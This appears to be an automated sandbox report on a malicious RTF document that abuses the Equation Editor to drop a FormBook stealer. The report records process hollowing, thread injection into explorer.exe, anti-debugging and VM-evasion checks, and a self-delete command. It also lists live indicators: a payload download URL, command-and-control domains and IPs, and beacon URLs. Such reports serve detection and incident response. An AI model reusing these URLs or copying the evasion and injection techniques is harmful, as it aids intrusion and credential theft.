Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winRTF@10/12@4/3

Source: C:\Users\user\AppData\Roaming\propser16364.exe

4_2_00403461

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 4_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

4_2_0040473E

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,

4_2_0040216B

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$080fbf_by_Libranalysis.rtf

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC38D.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: c8080fbf_by_Libranalysis.rtf	Virustotal: Detection: 50%
Source: c8080fbf_by_Libranalysis.rtf	ReversingLabs: Detection: 51%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\propser16364.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\propser16364.exe'	Jump to behavior

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: propser16364.exe, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: propser16364.exe, 00000005.00000002.2123186135.0000000002440000.00000040.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Unpacked PE file: 5.2.propser16364.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0040E8A7 push ds; retf	5_2_0040E8A8
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_004171BB push edx; iretd	5_2_004171BF
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00417294 push ecx; iretd	5_2_00417295
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00416B6B push ds; iretd	5_2_00416B72
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0040E3E0 push EC8EF736h; retf	5_2_0040E402
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00417CB1 push esi; iretd	5_2_00417CB2
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_004085A2 push ebx; ret	5_2_004085A3
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041CEB5 push eax; ret	5_2_0041CF08
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041CF6C push eax; ret	5_2_0041CF72
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041CF02 push eax; ret	5_2_0041CF08
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041CF0B push eax; ret	5_2_0041CF72
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00417726 push ss; retf	5_2_0041773E
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0040478A push eax; iretd	5_2_0040478F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9DFA1 push ecx; ret	7_2_00A9DFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_000971BB push edx; iretd	7_2_000971BF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00097294 push ecx; iretd	7_2_00097295
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0008E3E0 push EC8EF736h; retf	7_2_0008E402
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_000885A2 push ebx; ret	7_2_000885A3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00097726 push ss; retf	7_2_0009773E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0008478A push eax; iretd	7_2_0008478F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0008E8A7 push ds; retf	7_2_0008E8A8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00096B6B push ds; iretd	7_2_00096B72
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00097CB1 push esi; iretd	7_2_00097CB2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009CEB5 push eax; ret	7_2_0009CF08
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009CF0B push eax; ret	7_2_0009CF72
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009CF02 push eax; ret	7_2_0009CF08
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009CF6C push eax; ret	7_2_0009CF72

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\AppData\Roaming\propser16364.exe	File created: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\propser16364.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Roaming\propser16364.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\propser16364.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2680	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2276	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2276	Thread sleep time: -66000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 3064	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2476	Thread sleep time: -60000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	4_2_004059F0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_0040659C FindFirstFileA,FindClose,	4_2_0040659C
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_004027A1 FindFirstFileA,	4_2_004027A1

Source: explorer.exe, 00000006.00000000.2096466356.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2091045872.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000006.00000000.2096466356.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: propser16364.exe, 00000004.00000002.2090930540.00000000004D4000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 5_2_0040ACD0 LdrLoadDll,

5_2_0040ACD0

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_10001000 mov eax, dword ptr fs:[00000030h]	4_2_10001000
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_0044165A mov eax, dword ptr fs:[00000030h]	4_2_0044165A
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_00441872 mov eax, dword ptr fs:[00000030h]	4_2_00441872
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008426F8 mov eax, dword ptr fs:[00000030h]	5_2_008426F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA26F8 mov eax, dword ptr fs:[00000030h]	7_2_00AA26F8

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 4_2_10001444 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_10001444

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.photograph-gallery.com
Source: C:\Windows\explorer.exe	Domain query: www.devarajantraders.com
Source: C:\Windows\explorer.exe	Network Connect: 154.86.42.252 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.217.18.115 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.samytango.com

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Section loaded: unknown target: C:\Users\user\AppData\Roaming\propser16364.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: DE0000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Process created: C:\Users\user\AppData\Roaming\propser16364.exe C:\Users\user\AppData\Roaming\propser16364.exe	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\propser16364.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000000.2091183842.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2091183842.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2091045872.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2091183842.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\user\AppData\Roaming\propser16364.exe

4_2_00403461

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.239.243.112	carbinz.gq	Moldova Republic of	55933	CLOUDIE-AS-APCloudieLimitedHK	true
154.86.42.252	www.devarajantraders.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
172.217.18.115	ghs.googlehosted.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
www.devarajantraders.com	154.86.42.252	true
carbinz.gq	185.239.243.112	true
ghs.googlehosted.com	172.217.18.115	true
www.photograph-gallery.com	unknown	unknown
www.samytango.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.devarajantraders.com/xcl/?ZVeHz=RmzwS/19amak9riNwxnkKWY/GrwQkk+Z9h+s+sO794NmAWuM+4hewKU4PkGr68hD/xJogQ==&-ZAh4=mxo8s0M0KXs4hlP0	true	Avira URL Cloud: safe	unknown
www.shoprodeovegas.com/xcl/	true	Avira URL Cloud: safe	low
http://www.photograph-gallery.com/xcl/?ZVeHz=BgLP7+VyAbe+irQ8z0wpLO49yx16Kwx4jjQ33/W3X+9zq2VbrBj/CRN5ENeCInervJ/P3w==&-ZAh4=mxo8s0M0KXs4hlP0	false	Avira URL Cloud: safe	unknown
http://carbinz.gq/modex/prosperx.exe	true	Avira URL Cloud: malware	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://carbinz.gq/modex/prosperx.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp

Multi AV Scanner detection for domain / URL

Source: carbinz.gq

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe	ReversingLabs: Detection: 65%
